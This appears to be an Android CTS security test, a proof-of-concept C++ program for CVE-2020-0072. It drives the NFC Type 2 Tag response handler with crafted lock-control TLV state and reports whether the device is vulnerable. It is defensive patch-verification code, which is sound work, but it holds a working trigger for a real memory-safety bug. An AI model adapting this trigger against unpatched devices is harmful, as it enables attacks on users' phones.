unplugged-system/cts/hostsidetests/securitybulletin/securityPatch/CVE-2020-0072/poc.cpp

/*
 * Copyright (C) 2021 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include "../includes/common.h"
#include <log/log.h>
#include <stdlib.h>

#include <nfc_api.h>
#include <rw_int.h>

#define NUM_BYTES 1

extern tRW_CB rw_cb;
void rw_init(void);
void rw_t2t_handle_rsp(uint8_t *p_data);

void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) {
  (void)event;
  (void)p_rw_data;
}

int main() {
  tNFC_ACTIVATE_DEVT p_activate_params = {};
  p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
  p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
  RW_SetActivatedTagType(&p_activate_params, &poc_cback);
  if (rw_cb.p_cback != &poc_cback) {
    ALOGE("Structure tRW_CB mismatch rw_cb.p_cback=%p poc_cback=%p\n",
          rw_cb.p_cback, poc_cback);
    return EXIT_FAILURE;
  }
  tRW_T2T_CB *p_t2t = &rw_cb.tcb.t2t;
  rw_init();
  rw_cb.p_cback = &poc_cback;
  p_t2t->state = RW_T2T_STATE_DETECT_TLV;
  p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
  p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
  p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
  p_t2t->bytes_count = NUM_BYTES;
  p_t2t->tlv_value[1] = 0;
  int index = p_t2t->num_lock_tlvs;
  uint8_t data[T2T_READ_DATA_LEN];
  rw_t2t_handle_rsp(data);
  int ret = (p_t2t->lock_tlv[index].num_bits == p_t2t->tlv_value[1])
                ? EXIT_VULNERABLE
                : EXIT_SUCCESS;
  return ret;
}